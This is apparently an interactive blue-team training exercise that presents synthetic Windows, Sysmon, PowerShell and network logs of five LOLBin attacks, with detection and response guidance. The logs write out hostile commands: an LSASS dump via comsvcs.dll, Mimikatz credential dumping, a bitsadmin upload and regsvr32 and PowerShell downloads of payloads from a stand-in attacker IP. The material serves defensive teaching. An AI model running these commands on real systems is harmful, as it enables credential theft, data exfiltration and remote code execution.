🔍 The Invisible Adversary: 5 LOLBin Attacks
⚠️ SYNTHETIC SCENARIO: All logs, IPs, and IOCs are fictional and created for training purposes only.
📋 Scenario
Company: TechCorp Industries (Fictional)
Alert: Behavioral analytics detected anomalous activity across workstations using only built-in Windows tools
Your Mission: Identify 5 different LOLBin-based attacks hidden in the logs. No custom malware was used—only legitimate Windows binaries.
🎯 What are LOLBins?
Living Off The Land Binaries (LOLBins) are legitimate, digitally-signed Windows executables that attackers abuse to:
- Bypass antivirus and EDR detection (clean signatures)
- Execute malicious actions without dropping files
- Blend in with normal system activity
- Avoid behavioral alerts (trusted processes)
💡 Pro Tip: Focus on unusual parent-child process relationships, command-line arguments, and network activity from system tools. These are your best indicators!
🎮 How to Play
- Review logs in all 6 evidence tabs
- Answer questions about each attack technique
- Watch malicious logs highlight in red after correct answers
- Complete all 5 tasks to unlock the full attack summary
📊 Evidence Analysis
2025-11-26T08:15:23 [Event 4688] Process Created Computer: WKS-SALES-42 User: john.doe Process: C:\Windows\System32\rundll32.exe CommandLine: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 724 C:\temp\debug.bin full Parent: C:\Windows\System32\cmd.exe 2025-11-26T08:15:22 [Event 4672] Special Privileges Assigned User: john.doe Privileges: SeDebugPrivilege 2025-11-26T08:16:10 [Event 4624] Successful Logon User: john.doe LogonType: 2 (Interactive) Workstation: WKS-SALES-42 2025-11-26T08:22:15 [Event 4688] Process Created Computer: WKS-SALES-42 User: john.doe Process: C:\Windows\System32\schtasks.exe CommandLine: schtasks /create /tn "WindowsUpdateCheck" /tr "mshta vbscript:Execute(...)" /sc daily /st 09:00 /ru SYSTEM 2025-11-26T08:22:16 [Event 4698] Scheduled Task Created TaskName: \WindowsUpdateCheck User: john.doe Action: mshta.exe with vbscript payload 2025-11-26T08:30:45 [Event 4688] Process Created Computer: WKS-SALES-42 User: john.doe Process: C:\Windows\System32\certutil.exe CommandLine: certutil -encode C:\Users\john.doe\Documents\data.zip C:\temp\encoded.txt 2025-11-26T08:31:10 [Event 4688] Process Created Computer: WKS-SALES-42 User: john.doe Process: C:\Windows\System32\bitsadmin.exe CommandLine: bitsadmin /transfer exfilJob http://203.0.113.45/upload.php C:\temp\encoded.txt 2025-11-26T08:45:33 [Event 4688] Process Created Computer: WKS-SALES-42 User: john.doe Process: C:\Windows\System32\wbem\WMIC.exe CommandLine: wmic /node:10.20.30.50 process call create "powershell -NoP -W Hidden -Enc SQBFAFg..." 2025-11-26T08:45:35 [Event 4624] Network Logon Computer: WKS-IT-50 User: admin.smith LogonType: 3 (Network) Source: 10.20.30.42 (WKS-SALES-42) 2025-11-26T09:05:12 [Event 4688] Process Created Computer: WKS-IT-50 User: admin.smith Process: C:\Windows\System32\regsvr32.exe CommandLine: regsvr32 /s /u /i:http://203.0.113.45/payload.sct scrobj.dll 2025-11-26T09:05:15 [Event 4688] Process Created Computer: WKS-IT-50 User: admin.smith Process: C:\Windows\System32\mshta.exe Parent: C:\Windows\System32\regsvr32.exe CommandLine: mshta.exe javascript:eval("var s=new ActiveXObject...")
Event 10: ProcessAccess Time: 2025-11-26T08:15:23.567Z SourceImage: C:\Windows\System32\rundll32.exe TargetImage: C:\Windows\System32\lsass.exe GrantedAccess: 0x1FFFFF (PROCESS_ALL_ACCESS) CallTrace: comsvcs.dll+0x6fa00 Event 11: FileCreate Time: 2025-11-26T08:15:24.890Z Image: C:\Windows\System32\rundll32.exe TargetFilename: C:\temp\debug.bin Size: 52,428,800 bytes Event 1: ProcessCreate Time: 2025-11-27T09:00:05.123Z Image: C:\Windows\System32\mshta.exe ParentImage: C:\Windows\System32\taskeng.exe User: NT AUTHORITY\SYSTEM CommandLine: mshta.exe vbscript:Execute(...) Event 3: NetworkConnect Time: 2025-11-26T08:30:47.456Z Image: C:\Windows\System32\certutil.exe DestinationIp: 203.0.113.45 DestinationPort: 80 Event 1: ProcessCreate Time: 2025-11-26T08:31:10.678Z Image: C:\Windows\System32\bitsadmin.exe CommandLine: bitsadmin /transfer exfilJob http://203.0.113.45/upload.php Event 3: NetworkConnect Time: 2025-11-26T08:45:34.012Z Image: C:\Windows\System32\wbem\WMIC.exe DestinationIp: 10.20.30.50 DestinationPort: 135 (RPC) Event 1: ProcessCreate Time: 2025-11-26T08:45:35.345Z Computer: WKS-IT-50 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe User: TECHCORP\admin.smith Event 3: NetworkConnect Time: 2025-11-26T09:05:13.234Z Image: C:\Windows\System32\regsvr32.exe DestinationIp: 203.0.113.45 DestinationPort: 80 Event 1: ProcessCreate Time: 2025-11-26T09:05:15.890Z Image: C:\Windows\System32\mshta.exe ParentImage: C:\Windows\System32\regsvr32.exe CommandLine: mshta.exe javascript:eval(...)
# Event 4104 - Script Block Logging # Time: 2025-11-26T08:16:45 # Computer: WKS-SALES-42 $dumpFile = "C:\temp\debug.bin" $bytes = [System.IO.File]::ReadAllBytes($dumpFile) # Processing LSASS dump offline... # Event 4104 # Time: 2025-11-26T08:45:36 # Computer: WKS-IT-50 # Decoded WMI payload: IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/stage1.ps1') # Execute Mimikatz in memory Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords" # Event 4104 # Time: 2025-11-26T09:05:17 # Computer: WKS-IT-50 # Encrypted C2 stager $wc = New-Object System.Net.WebClient $data = $wc.DownloadData('http://203.0.113.45:8080/stage2') $key = [Text.Encoding]::ASCII.GetBytes('key12345') # Decrypt and execute in memory... # Event 4104 # Time: 2025-11-27T09:00:06 # Computer: WKS-SALES-42 # User: NT AUTHORITY\SYSTEM # Persistence payload from scheduled task $c = New-Object-ComObject MSScriptControl.ScriptControl $c.Language = 'VBScript' $c.AddCode('CreateObject("Wscript.Shell").Run "powershell -NoP -W Hidden..."')
08:15:10 | 10.20.30.42:49152 -> 10.20.10.5:445 | SMB | Tree Connect: \\DC01\IPC$ 08:30:47 | 10.20.30.42:49234 -> 203.0.113.45:80 | HTTP GET /download/cert_bypass.txt 08:31:11 | 10.20.30.42:49235 -> 203.0.113.45:80 | HTTP POST /upload.php Content-Type: application/octet-stream Content-Length: 524288 bytes User-Agent: Microsoft BITS/7.5 08:45:33 | 10.20.30.42:49301 -> 10.20.30.50:135 | RPC Endpoint Mapper Request 08:45:34 | 10.20.30.42:49302 -> 10.20.30.50:49667 | DCOM IWbemServices::ExecMethod Method: Win32_Process.Create CommandLine: powershell -NoP -W Hidden... 08:45:36 | 10.20.30.50:49700 -> 203.0.113.45:443 | TLS Client Hello 09:05:13 | 10.20.30.50:49750 -> 203.0.113.45:80 | HTTP GET /payload.sct User-Agent: regsvr32/1.0 09:05:17 | 10.20.30.50:49752 -> 203.0.113.45:8080 | HTTP POST /c2/beacon Encrypted payload (C2 callback)
[File Created] 2025-11-26T08:15:24 Path: C:\temp\debug.bin Size: 52,428,800 bytes (50 MB) Description: LSASS memory dump Owner: TECHCORP\john.doe [File Modified] 2025-11-26T08:22:16 Path: C:\Windows\System32\Tasks\WindowsUpdateCheck Content: Scheduled task XML with mshta.exe payload [File Created] 2025-11-26T08:28:30 Path: C:\Users\john.doe\Documents\data.zip Size: 5,242,880 bytes (5 MB) Contents: Financial_Q4.xlsx, Passwords.txt [File Created] 2025-11-26T08:30:46 Path: C:\temp\encoded.txt Size: 7,340,032 bytes (base64 encoded) Tool: certutil.exe [File Deleted] 2025-11-26T08:32:15 Path: C:\temp\encoded.txt Process: cmd.exe (cleanup) [File Created] 2025-11-26T08:46:12 Computer: WKS-IT-50 Path: C:\temp\creds.txt Content: Mimikatz output - credentials [Registry Modified] 2025-11-26T09:05:14 Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value: "SecurityUpdate" = "regsvr32 /s /u /i:http://203.0.113.45/payload.sct scrobj.dll"
🚨 HIGH SEVERITY ALERTS: 5 ⚠️ MEDIUM SEVERITY: 8 ℹ️ LOW SEVERITY: 12 User: john.doe Anomaly: PowerShell accessing LSASS (NEVER seen) Risk Score: 95/100 (CRITICAL) Rare Process Chain: cmd.exe → schtasks.exe → Task with mshta payload Frequency: 0.01% of all processes External Connection (Non-Whitelisted): 203.0.113.45:80 - 15 connections First Seen: 2025-11-26 08:30:47 Reputation: UNKNOWN User: admin.smith Anomaly: Logged in from WKS-SALES-42 (NEVER authorized) Risk Score: 88/100 (CRITICAL) Suspicious Process Chain: regsvr32.exe → mshta.exe → powershell.exe Frequency: 0.005% (Defense Evasion) Timeline Correlation: 08:15 ▶ Credential Dump → 08:22 ▶ Persistence → 08:30 ▶ Exfil → 08:45 ▶ Lateral → 09:05 ▶ Evasion Total Attack Duration: 50 minutes (FAST ATTACK)
📝 Investigation Tasks
Complete all 5 tasks to unlock the attack summary and detailed explanations.
TASK 1
T1003.001
Attack #1: Credential Dumping
Question: Which LOLBin and DLL combination was used to dump LSASS memory?
TASK 2
T1053.005
Attack #2: Persistence
Question: What persistence mechanism was used?
Follow-up: What is the name of the malicious scheduled task?
TASK 3
T1048.003
Attack #3: Data Exfiltration
Question: Select ALL LOLBins used for data exfiltration:
TASK 4
T1047
Attack #4: Lateral Movement
Question: Which LOLBin was used for remote code execution on another workstation?
💡 Hint: Check Windows Events around 08:45 AM for remote execution
TASK 5
T1218.010
Attack #5: Defense Evasion
Question: Identify the defense evasion process chain. What spawned what?
Tasks Completed: 0 / 5
🎯 Complete Attack Analysis
📅 Attack Timeline & Techniques
08:15 AM - Credential Dumping (T1003.001)
What Happened: Attacker used rundll32.exe to call MiniDump function from comsvcs.dll (COM+ Services DLL) to dump LSASS process memory to C:\temp\debug.bin.
Why It's Malicious:
- LSASS contains Kerberos tickets, NTLM hashes, and plaintext passwords
- rundll32.exe accessing LSASS with PROCESS_ALL_ACCESS is extremely suspicious
- SeDebugPrivilege was assigned (required for LSASS access)
- 50 MB dump file created in temp directory (typical LSASS size)
Detection: Monitor for rundll32.exe accessing lsass.exe with comsvcs.dll in command line
08:22 AM - Persistence via Scheduled Task (T1053.005)
What Happened: Created scheduled task named "WindowsUpdateCheck" (mimicking legitimate update task) to execute mshta.exe with VBScript payload daily at 9:00 AM as SYSTEM.
Why It's Malicious:
- Task runs as NT AUTHORITY\SYSTEM (highest privileges)
- Uses mshta.exe to execute encoded VBScript (evasion technique)
- Name "WindowsUpdateCheck" designed to blend in with legitimate tasks
- Downloads additional payloads from attacker server at 203.0.113.45
Detection: Alert on scheduled tasks created with mshta.exe, regsvr32.exe, or encoded scripts
08:30 AM - Data Staging & Exfiltration (T1048.003)
What Happened: Used certutil.exe to Base64 encode sensitive data (5 MB archive), then used bitsadmin.exe (Windows BITS service) to upload to attacker server.
Why It's Malicious:
- certutil.exe used to encode data (bypasses DLP that scans unencoded files)
- BITS service abused for stealthy data transfer (resumes on network interruption)
- External connection to 203.0.113.45 (unknown, non-whitelisted IP)
- File deleted after upload (anti-forensics)
- 524 KB uploaded containing financial data and passwords
Detection: Monitor certutil.exe with -encode/-decode flags, BITS jobs to external IPs
08:45 AM - Lateral Movement via WMI (T1047)
What Happened: Used wmic.exe to remotely execute PowerShell on workstation WKS-IT-50 (10.20.30.50), launching Mimikatz in memory to dump more credentials.
Why It's Malicious:
- WMI remote process creation from non-admin workstation (unusual)
- PowerShell spawned from WmiPrvSE.exe (WMI Provider Host) indicates remote execution
- admin.smith credentials used from unauthorized location (WKS-SALES-42)
- Encoded PowerShell command (obfuscation)
- Downloaded and executed Mimikatz in memory (fileless attack)
Detection: Alert on wmic.exe with /node parameter, PowerShell parent = WmiPrvSE.exe
09:05 AM - Defense Evasion Chain (T1218.010)
What Happened: Used "Squiblydoo" technique - regsvr32.exe downloaded remote scriptlet (.sct file) which spawned mshta.exe to execute JavaScript that launched PowerShell C2 stager.
Why It's Malicious:
- regsvr32.exe downloading from internet (not typical usage)
- Abnormal process chain: regsvr32 → mshta → powershell (multi-stage evasion)
- User-Agent "regsvr32/1.0" in HTTP request (indicates abuse)
- Persistence added via registry Run key (survives reboots)
- Encrypted C2 communication to 203.0.113.45:8080
Detection: Monitor regsvr32.exe with /i: and http:// in command line, unusual parent-child relationships
🔬 Why These Logs Are Malicious: Behavioral Indicators
🚨 Key Detection Points:
- Abnormal Parent-Child Relationships: rundll32→lsass, taskeng→mshta, WmiPrvSE→powershell, regsvr32→mshta
- LOLBins Making Network Connections: certutil, regsvr32, mshta connecting to external IPs
- Command-Line Anomalies: Base64 encoding, /i:http://, comsvcs.dll MiniDump, /node parameter
- Privilege Escalation: SeDebugPrivilege assignment, SYSTEM scheduled tasks
- Rapid Attack Progression: 5 different techniques in 50 minutes (automated/scripted)
- Anti-Forensics: File deletion, registry modification, memory-only payloads
🛡️ Comprehensive Defense Strategy
🚨 Immediate Response
- Isolate WKS-SALES-42 and WKS-IT-50 from network
- Disable john.doe and admin.smith accounts
- Block 203.0.113.45 at firewall
- Delete malicious scheduled task
- Force password resets for all users
- Scan for additional compromised systems
🔧 Technical Controls
- Enable LSASS Protection (RunAsPPL)
- Enable Credential Guard
- Deploy Attack Surface Reduction rules
- Block WMI remote execution (unless needed)
- Restrict BITS service to demand-start
- Enable PowerShell logging (Module + ScriptBlock)
📊 Detection Rules
- Sysmon: Monitor all LSASS access
- Alert: rundll32.exe + comsvcs.dll + MiniDump
- Alert: Scheduled tasks with LOLBins
- Alert: certutil -encode/-decode
- Alert: BITS jobs to external IPs
- Alert: wmic /node remote execution
- Alert: regsvr32 /i:http://
🎓 What You Learned
LOLBin attacks are difficult to detect because:
- ✅ Signed Binaries: All tools are Microsoft-signed, pass signature checks
- ✅ Clean File Hashes: No malware files to scan, everything in memory
- ✅ Legitimate Functions: Each tool performs its intended function (just abused)
- ❌ Behavioral Anomalies: Detection relies on understanding NORMAL vs ABNORMAL usage
Key Takeaway: Focus on context, relationships, and behavior rather than file signatures alone!
🎉 Challenge Completed!
You've successfully identified all 5 LOLBin attacks and understand why they're malicious.
← Return to Homepage🎉
All Tasks Completed!
5 / 5 ✓
Scroll down for the complete attack analysis